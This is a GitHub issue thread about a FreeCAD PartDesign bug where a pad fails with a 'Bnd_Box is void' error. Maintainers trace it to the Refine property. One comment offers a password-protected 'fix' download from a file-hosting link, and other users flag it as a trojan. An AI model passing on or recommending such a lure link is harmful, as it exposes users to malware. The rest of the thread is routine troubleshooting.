### ISSUE TITLE
Can not pad a rectangle sketch : "Cannot compute Inventor representation for the shape" and pocket acts as pad

### ISSUE THREAD

**Issue by petrubecheru** [FreeCAD/FreeCAD#16084]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

I added a rectangle sketch to YZ plane of cutter-y body (see picture bellow). 
![image](https://github.com/user-attachments/assets/81d1f9b2-44dd-4ae7-b67d-212498ad3b25)

There are 2 problems:
1. can not pad it (error: Cannot compute Inventor representation for the shape of PrusaXLFilamentLoader3#Pad036: Bnd_Box is void)
2. if I use pocket tool, it pads the sketch (instead of making a poket) :
![image](https://github.com/user-attachments/assets/ab41b920-aab6-4483-8c6c-9ef0cf93b5b7)

### Full version info

```shell
OS: Ubuntu Core 22 (KDE/plasma)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38516 (Git) Snap 1116
Build type: Release
Branch: main
Hash: 46a84da571d51b135e16ac4731baaf67c552d791
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: English/United States (en_US)
```

### Subproject(s) affected?

PartDesign

### Anything else?

[project.zip](https://github.com/user-attachments/files/16755692/project.zip)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by leoheck** [comment]
@luzpaz can you remove this comment above. is it possible to block this motherfucker?

**Comment by luzpaz** [comment]
Sorry, @leoheck i didn't mean to mark your comment as 'Abuse' as well. Trigger-finger from dealing with this shady trojan person.

**Comment by maxwxyz** [comment]
Seems like a typical OCC bug. Does it work in the stable 0.21.2 version?

**Comment by FlachyJoe** [comment]
@petrubecheru Switching the `Pad021` `Refine` property to `False` solves your issue.

**Comment by FlachyJoe** [comment]
Then certainly test with my dev branch and it will be fixed by #16030

**Comment by FlachyJoe** [comment]
@petrubecheru have you play with the Refine property, of the failing pad and the previous ops?

**Comment by luzpaz** [comment]
@petrubecheru thanks + do you mind just copy/pasting [About](https://wiki.freecad.org/About) info instead of screenshot next time ? There are other 3rd party libs that don't show up in the UI that are displayed in the text info. TIA

**Comment by FlachyJoe** [comment]
I definitively can fix the problem with
```python
App.ActiveDocument.Pad021.Refine = False
App.ActiveDocument.recompute()
```

> OS: Debian GNU/Linux trixie/sid (XFCE/xfce)
> Word size of FreeCAD: 64-bit
> Version: 1.1.0dev.38794 (Git)
> Build type: Debug
> Branch: main
> Hash: a47800d9ccd7d7a7cdb1779d56de03d3c64cd76e
> Python 3.12.6, Qt 5.15.13, Coin 4.0.2, Vtk 9.3.0, OCC 7.8.2.dev
> Locale: English/United States (en_US) [ OS: French/France (fr_FR) ]
> Stylesheet/Theme/QtStyle: unset/Classic/Qt default




Some of your sketches lacks constraints, be careful with visual-only coincidences which can create small edges.

**Comment by FlachyJoe** [comment]
@petrubecheru please reduce your file to the minimal failing or ask [to the forum](https://forum.freecad.org/) for help with design.

**Comment by FlachyJoe** [comment]
`Pad024.Refine = False`
Auto-refine is a pity, disable it in your preferences and think when you need it.

Are you still angry with coincident constraints?
